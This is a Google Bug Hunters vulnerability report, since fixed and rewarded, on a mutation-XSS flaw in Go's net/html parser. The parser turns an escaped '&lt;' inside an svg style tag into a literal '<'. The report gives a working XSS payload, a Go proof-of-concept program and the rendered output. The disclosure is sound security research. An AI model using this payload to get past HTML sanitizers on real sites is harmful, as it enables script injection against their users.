Skip to Content (Press Enter)
Google
Bug Hunters
Golang net/html parse the &lt; into < inside style tag that could lead to XSS
Google VRP
triaged
14:51 | Jun 28, 2023
accepted
16:47 | Jun 28, 2023
triaged
15:51 | Jul 7, 2023
accepted
16:26 | Jul 7, 2023
fixed
12:26 | Aug 31, 2023
reward decided
$7,500
Summary:
Golang net/html parse the < into < inside style tag that could lead to XSS
The vulnerability is known to third parties!
Product:
Golang
URL:
github.com/golang/net
Vulnerability type:
Other
Details
Hi there.
i've been checking the golang net/html lately and i found this.
net/html parser will parse the < and > symbol into &lt(; )and &gt(;) in some context. and leave it as it is in some context.
but the same as the browser. net/html did parse the &lt(;) into < inside of the style tag.
if somehow the website give the user to insert / input only the h1, h2, h3 but the rest getting deleted it could also lead to some vulnerabilities.
for example. this payload right here
<svg><style>/* &lt;/style> &lt;img src=x onerror=alert(document.domain)>
if that payload get parse with this code
package main

import (
    "bytes"
    "errors"
    "fmt"
    "golang.org/x/net/html"
    "io"
    "log"
    "strings"
)

func Body(doc *html.Node) (*html.Node, error) {
    var body *html.Node
    var crawler func(*html.Node)
    crawler = func(node *html.Node) {
        if node.Type == html.ElementNode && node.Data == "body" {
            body = node
            return
        }
        for child := node.FirstChild; child != nil; child = child.NextSibling {
            crawler(child)
        }
    }
    crawler(doc)
    if body != nil {
        return body, nil
    }
    return nil, errors.New("Missing <body> in the node tree")
}

func renderNode(n *html.Node) string {
    var buf bytes.Buffer
    w := io.Writer(&buf)
    html.Render(w, n)
    return buf.String()
}

const parsethis = "<body><svg><style>/* &lt;/style> &lt;img src=x onerror=alert(document.domain)>"

func main() {
    doc, _ := html.Parse(strings.NewReader(parsethis))
    bn, er := Body(doc)
    if er != nil {
        log.Fatal(er)
    }
    body := renderNode(bn)
    fmt.Println("\n------P2\n", parsethis, "\n", body, "\n-------\n")

}
it will return this (< turn into <)
<body><svg><style>/* </style> <img src=x onerror=alert(document.domain)></style></svg></body>
but because the the input only allowed the h1 tag. the svg tag will get removed and the rest will be served. because the rest is the text / content inside the <style>.
and the <style> also been closed and onerror inside of the <img> will be triggered.
Attack scenario
attacker could inject malicious javascript code.
登录
使用 Google 账号登录